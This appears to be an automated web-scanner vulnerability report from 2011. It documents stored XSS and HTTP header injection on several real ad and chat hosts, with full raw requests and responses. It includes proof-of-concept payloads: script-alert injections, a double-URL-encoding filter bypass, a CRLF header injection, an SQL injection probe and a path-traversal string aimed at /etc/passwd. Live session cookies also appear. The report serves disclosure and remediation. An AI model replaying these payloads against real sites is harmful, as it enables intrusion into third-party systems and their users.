HTTP/1.1 200 Denied
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-dotDefender-denied: 1
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:35:33 GMT
Connection: close
Content-Length: 1305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
<title>Your request has been blocked</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<meta name="robots" content="noindex, nofollow, noarchive"/>
<style type="text/css">
body {margin:0px;font-family:Verdana,sans-serif;font-size:12px} #box {width:600px;border:solid 1px #5183b4;text-align:left; padding:5px; margin:100px auto auto auto} #datetime { text-align:left; color:#ABABAB; font-size:10px} #message { width:500px; margin:0px auto 0px auto; padding:0px} #refid { font-weight:bold; font-size:13pt; margin:10px auto 5px auto; width:500px; padding:0px} h1 {font-size:22px;color:#D70637;font-weight:bold;text-align:center} a {color:black} a:hover {color:#5183b4}
</style>
   </head>
   <body>
<div id="box">
<span id="datetime">16-Sep-11</span>
<h1>This request has been blocked.</h1><br/>
<div id="message">Please contact the site administrator, and provide the following Reference ID:</div>
<div id="refid">5643-8923-23FA-8C9B</div>
</div>
   </body>
</html>

Request 2

GET /res/opt/screen.css?v=2011061619496541%20or%201%3d2--%20 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://www.bradsdeals.com/dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=40626594; CFTOKEN=23649149; TID=306656; LB-Persist=/pPhdebA/HT971C4FjQO/6Xok17iTa3KEc4Lh3NCVVGPLf87tgiQBEUoPmU9nYohCXdgBLGdk6jTDw==

Response 2

HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Mon, 29 Aug 2011 21:05:43 GMT
Accept-Ranges: bytes
ETag: "80ede6698f66cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:35:34 GMT
Content-Length: 69864

body{color:#666;background:#fff;font:75%/140% Arial,Tahoma,Verdana,Helvetica,sans-serif;margin:0;padding:0;}table{border-spacing:0;border-collapse:collapse;}ul,ol{margin:.25em 0 1em 2em;padding-left:0;}li{margin-top:.25em;margin-bottom:.5em;}dt{font-weight:bold;margin:.5em 0 .12em 0;}dd{margin:.12em 0 .5em 0;}fieldset{margin:32px 0;padding:12px;border:1px solid #ccc;}legend{font-size:16px;color:#666;}button,input{font-size:100%;font-family:Arial,Tahoma,Verdana,Helvetica,sans-serif;}a{color:#3c85de;text-decoration:none;}a.hover,a:hover{text-decoration:underline;}a img{border:none;}h1,h2,.h2,h3,h4,h5,h6{font-family:Arial,Tahoma,Verdana,Helvetica,sans-serif;line-height:120%;margin:0;}h1{font-size:220%;margin:.25em 0 .75em;font-weight:normal;}h2,.h2{font-size:200%;margin:1em 0 .5em;font-weight:normal;}h3{font-size:135%;margin:0 0 .5em;font-weight:normal;}h4{font-size:100%;margin:0;}h5{font-size:90%;}h6{font-size:80%;}h1.divider,h2.divider,.h2.divider{border-bottom:1px solid #ddd;padding-bottom:.5em;height:1%;}p{margin-top:1em;margin-bottom:1em;}b,strong{font-weight:bold;}i,em{font-style:oblique;}blockquote{margin:1em 3em;}.hr hr{display:none;}.skipper{position:absolute;left:-5000px;top:0;width:1px;height:1px;overflow:hidden;}.hide{position:absolute;left:-5000px;top:0;width:1px;height:1px;overflow:hidden;}.error{color:#AF0000;}img{-ms-interpolation-mode:bicubic;}.cfx:after{content:".";display:block;height:0;clear:both;visibility:hidden;}.cfx:after{line-height:0;}.cfx{display:inline-block;}/* Hides from IE-mac \*/ * html .cfx{height:1%;}.cfx{display:block;}/* End hide from IE-mac */body{background:#f8faeb url("../images/bg_body_tile.jpg") top center repeat;}#pageBounds{background:transparent url("../images/bg_body_top.jpg") top center repeat-x;}body.iframe{background:#fff none;padding:10px 20px;}#content{width:948px;margin:0 auto;position:relative;}#mainColumn{float:left;padding:0 4px;width:580px;margin:0;position:relative;z-index:4;}#topRightColumn,#sideColumn{float:righ
...[SNIP]...

2. Cross-site scripting (stored)  previous  next
There are 4 instances of this issue:

Issue background

Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.

Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://ar.voicefive.com/bmx3/broker.pli [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the pid request parameter submitted to the URL /bmx3/broker.pli is copied into the HTML document as plain text between tags at the URL /bmx3/broker.pli. The payload 35525%253cscript%253ealert%25281%2529%253c%252fscript%253ef2ebf4b3f03 was submitted in the pid parameter. This input was returned as 35525<script>alert(1)</script>f2ebf4b3f03 in a subsequent request for the URL /bmx3/broker.pli.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the pid request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /bmx3/broker.pli?pid=35525%253cscript%253ealert%25281%2529%253c%252fscript%253ef2ebf4b3f03&PRAd=348445181&AR_C=233006068 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/xhr/ad/LREC/2115823648?ref=aHR0cDovL3d3dy55YWhvby5jb20v&token=b475da4881df940801d7698aa9d116ab
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; UID=9cc29993-80.67.74.150-1314836282

Request 2

GET /bmx3/broker.pli?pid=p63514475&PRAd=348445181&AR_C=233006068 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/xhr/ad/LREC/2115823648?ref=aHR0cDovL3d3dy55YWhvby5jb20v&token=b475da4881df940801d7698aa9d116ab
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; UID=9cc29993-80.67.74.150-1314836282

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 00:54:37 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p63514475=exp=26&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:54:37 2011&250d16de58214c9a371d551e=1&prad=348445181&arc=233006068&; expires=Fri 16-Dec-2011 00:54:37 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 30216

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"348445181",Pid:"p63514475",Arc:"233006068",Location:
...[SNIP]...
00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&', "UID": '9cc29993-80.67.74.150-1314836282../../../../../../../../etc/passwd%009cc29993-80.67.74.150-1314836282', "ar_35525<script>alert(1)</script>f2ebf4b3f03": 'exp=1&initExp=Sat Sep 17 00:54:37 2011&recExp=Sat Sep 17 00:54:37 2011&prad=348445181&arc=233006068&', "BMX_3PC": '1', "ar_p63514475250d16deff7e44d5a47a3990": 'exp=1&initExp=Sat Sep 17 00:54:33 2
...[SNIP]...

2.2. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-507/d3/jsc/fm.js

Issue detail

The value of the $ request parameter submitted to the URL /bar/v16-507/d3/jsc/fm.js is copied into a JavaScript string which is encapsulated in single quotation marks at the URL /bar/v16-507/d3/jsc/fm.js. The payload 284b8'-alert(1)-'04109d7f66c was submitted in the $ parameter. This input was returned unmodified in a subsequent request for the URL /bar/v16-507/d3/jsc/fm.js.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request 1

GET /bar/v16-507/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=14&q=&$=284b8'-alert(1)-'04109d7f66c&s=2&z=0.2868958928156644 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm784Zb43199; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,1#0,24:0,6#0,24:0,6#0,24; aps=2; FFcat=933,56,15:951,2,15; FFad=1:1; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0

Request 2

GET /bar/v16-507/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=14&q=&$=collective728x90&s=2&z=0.2868958928156644 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm784Zb43199; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,1#0,24:0,6#0,24:0,6#0,24; aps=2; FFcat=933,56,15:951,2,15; FFad=1:1; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0

Response 2

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=951:284b8'-alert(1)-'04109d7f66c,b909c%27%3ba372b7aa248,collective728x90,b909c';expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,14:951,2,14:933,56,15:951,2,15dd3b5ba9ef00e97d324cdbd6;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=28:27:None:None;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "aa1b9a-8952-4accb58ae5040"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=18
Expires: Sat, 17 Sep 2011 01:49:38 GMT
Date: Sat, 17 Sep 2011 01:49:20 GMT
Content-Length: 2692
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var z11=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='284b8'-alert(1)-'04109d7f66c,b909c%27%3ba372b7aa248,collective728x90,b909c'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=284b8'-alert(1)-'04109d7f66c,b909c%27%3ba372b7aa248,collective728x90,b909c';
...[SNIP]...

2.3. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-507/d3/jsc/fm.js

Issue detail

The value of the $ request parameter submitted to the URL /bar/v16-507/d3/jsc/fm.js is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /bar/v16-507/d3/jsc/fm.js. The payload 5969c"-alert(1)-"5ef3bafc3c0 was submitted in the $ parameter. This input was returned unmodified in a subsequent request for the URL /bar/v16-507/d3/jsc/fm.js.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request 1

GET /bar/v16-507/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=14&q=&$=5969c"-alert(1)-"5ef3bafc3c0&s=2&z=0.2868958928156644 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm784Zb43199; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,1#0,24:0,6#0,24:0,6#0,24; aps=2; FFcat=933,56,15:951,2,15; FFad=1:1; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0

Request 2

GET /bar/v16-507/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=14&q=&$=collective728x90&s=2&z=0.2868958928156644 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm784Zb43199; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,1#0,24:0,6#0,24:0,6#0,24; aps=2; FFcat=933,56,15:951,2,15; FFad=1:1; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0

Response 2

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=951:5969c"-alert(1)-"5ef3bafc3c0,c3994%22%3b85a41f5da2f,collective728x90,c3994";expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,14:951,2,14:933,56,15:951,2,15dd3b5ba9ef00e97d324cdbd6;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=20:19:None:None;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "aa1b9a-8952-4accb58ae5040"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=21
Expires: Sat, 17 Sep 2011 01:49:37 GMT
Date: Sat, 17 Sep 2011 01:49:16 GMT
Content-Length: 2692
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var z11=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='5969c"-alert(1)-"5ef3bafc3c0,c3994%22%3b85a41f5da2f,collective728x90,c3994"';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=5969c"-alert(1)-"5ef3bafc3c0,c3994%22%3b85a41f5da2f,collective728x90,c3994";z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

var zzhasAd=undefined;


                               
...[SNIP]...

2.4. http://livechat.iadvize.com/chat_init.js [vuid cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://livechat.iadvize.com
Path:   /chat_init.js

Issue detail

The value of the vuid cookie submitted to the URL /chat_init.js is copied into the HTML document as plain text between tags at the URL /chat_init.js. The payload 2e364<script>alert(1)</script>b793934a58c was submitted in the vuid cookie. This input was returned unmodified in a subsequent request for the URL /chat_init.js.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request 1

GET /chat_init.js?sid=1821 HTTP/1.1
Host: livechat.iadvize.com
Proxy-Connection: keep-alive
Referer: http://www.mailjet.com/features
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vuid=fc0d3bf4f99e190aeffd3c6b449e3ce04e736ab952c622e364<script>alert(1)</script>b793934a58c; 1821vvc=3; 1821_idz=XnclJ01Pg6id2FcJU13kUkMfaXVNV%2F8gxkjQn8hBPcG6LNaooz40h%2BMaW0hQlsjGSRD%2BkhBEQXtHEo8uNUWZDoUCReT5yO90BLxF%2FLlYyUr51FG%2FyyfLpChY7rUtOwVCw8l%2Fg3u5V7ZarDSzVOiKi6RLcJ2O; 1821_idzp=%7B%22site_id%22%3A1821%2C%22chatcount%22%3A0%2C%22nbrVisite%22%3A2%2C%22country%22%3Anull%2C%22country_name%22%3A%22%22%2C%22city%22%3A%22%22%2C%22lat%22%3Anull%2C%22long%22%3Anull%2C%22lang%22%3A%22en%22%2C%22visitorname%22%3A%22+%22%2C%22extID%22%3Anull%2C%22pageview%22%3A1%2C%22connectionTime%22%3A1316210078%2C%22navTime%22%3A1000%2C%22origin_site%22%3A%22%22%2C%22origin%22%3A%22direct%22%2C%22refengine%22%3A%22%22%2C%22refkeyword%22%3A%22%22%7D

Request 2

GET /chat_init.js?sid=1821 HTTP/1.1
Host: livechat.iadvize.com
Proxy-Connection: keep-alive
Referer: http://www.mailjet.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1821vvc=2; vuid=fc0d3bf4f99e190aeffd3c6b449e3ce04e736ab952c62

Response 2

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Fri, 16 Sep 2011 21:55:08 GMT
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
P3P: policyref="http://livechat.iadvize.com/w3c/p3p.xml", CP="NID DSP NON COR"
Set-Cookie: vuid=fc0d3bf4f99e190aeffd3c6b449e3ce04e736ab952c622e364%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb793934a58c; expires=Sun, 15-Sep-2013 21:55:08 GMT; path=/
Set-Cookie: 1821_idzp=%7B%22origin_site%22%3A%22%22%2C%22origin%22%3A%22direct%22%2C%22refengine%22%3A%22%22%2C%22refkeyword%22%3A%22%22%2C%22site_id%22%3A1821%2C%22lang%22%3A%22en%22%2C%22pageview%22%3A6%2C%22referrer_lastPage%22%3A%22http%3A%5C%2F%5C%2Fwww.mailjet.com%5C%2F%22%2C%22timeElapsed%22%3A21936835.13%2C%22navTime%22%3A1316210108000%7D; path=/
Expires: Mon, 22 Jan 1978 12:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 42132

if(typeof(iAdvize) !== 'object'){
   
if (/Safari/.test(navigator.userAgent) && !(/Chrome/.test(navigator.userAgent))) {
   var Sbody = document.getElementsByTagName( 'BODY' )[ 0 ];
   var newNode = docume
...[SNIP]...

       iframe.name = name;
       iframe.src = 'javascript:false';
       div.appendChild(iframe);
       form.action = 'http://livechat.iadvize.com/saveuid.php?sid=1821&vuid=fc0d3bf4f99e190aeffd3c6b449e3ce04e736ab952c622e364<script>alert(1)</script>b793934a58c';
       form.method = 'POST';
       form.target = name;
       div.appendChild(form);
       form.submit();
   }, 10);
}

if(typeof(iAdvize2) === 'undefined'){
           iAdvize2 = {}
}

/*! LAB.js (LABjs :: Loading And Blockin
...[SNIP]...

3. HTTP header injection  previous  next
There are 4 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


3.1. http://2912a.v.fwmrm.net/ad/l/1 [cr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://2912a.v.fwmrm.net
Path:   /ad/l/1

Issue detail

The value of the cr request parameter is copied into the Location response header. The payload d8d28%0d%0aeb92866aa30 was submitted in the cr parameter. This caused a response containing an injected HTTP header.

Request

GET /ad/l/1?last=1&ct=0&metr=0&s=b035&t=1316221067347346&adid=661886&reid=352172&arid=0&auid=&cn=defaultImpression&et=i&_cc=661886,352172,,12523.,1316221067,1&tpos=&init=1&cr=d8d28%0d%0aeb92866aa30 HTTP/1.1
Host: 2912a.v.fwmrm.net
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e5045525d5f4f58455e445a4a423208; _sid="b035_5653126437071259822"; _uid="b035_5653126437071259818"; _vr="1316221067.58849.661884~661886~,"; _cph="1316221067.1103.1.1,"; _sc="sg193954.1316221067.1316221068.28800.0.0,"; _wr="g193954"

Response

HTTP/1.1 302 Found
Set-Cookie: _uid="b139_5653128498656399883";expires=Sun, 16 Sep 2012 01:09:18 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _auv="g193954~1.1316221551.0,5.1316221758.0,21966.1316221551.0,21967.1316221758.0,^";expires=Mon, 17 Oct 2011 01:09:18 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _vr="1316221757.58849.648140~648142~661884~661886~664345~,1316221527.58849784063c197da02440673a1ca.664345~,1316221526.784063c1d09056819c7a889b.661884~661886~,";expires=Mon, 17 Oct 2011 01:09:18 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _cph="1316221670.1103.1.1,";expires=Mon, 17 Oct 2011 01:09:18 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg193954.1316221067.1316221758.28800.0.68412102,";expires=Mon, 17 Oct 2011 01:09:18 GMT;domain=.fwmrm.net;path=/;
Location: d8d28
eb92866aa30

Content-Length: 0
Date: Sat, 17 Sep 2011 01:09:17 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"


3.2. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-507/d3/jsc/fm.js

Issue detail

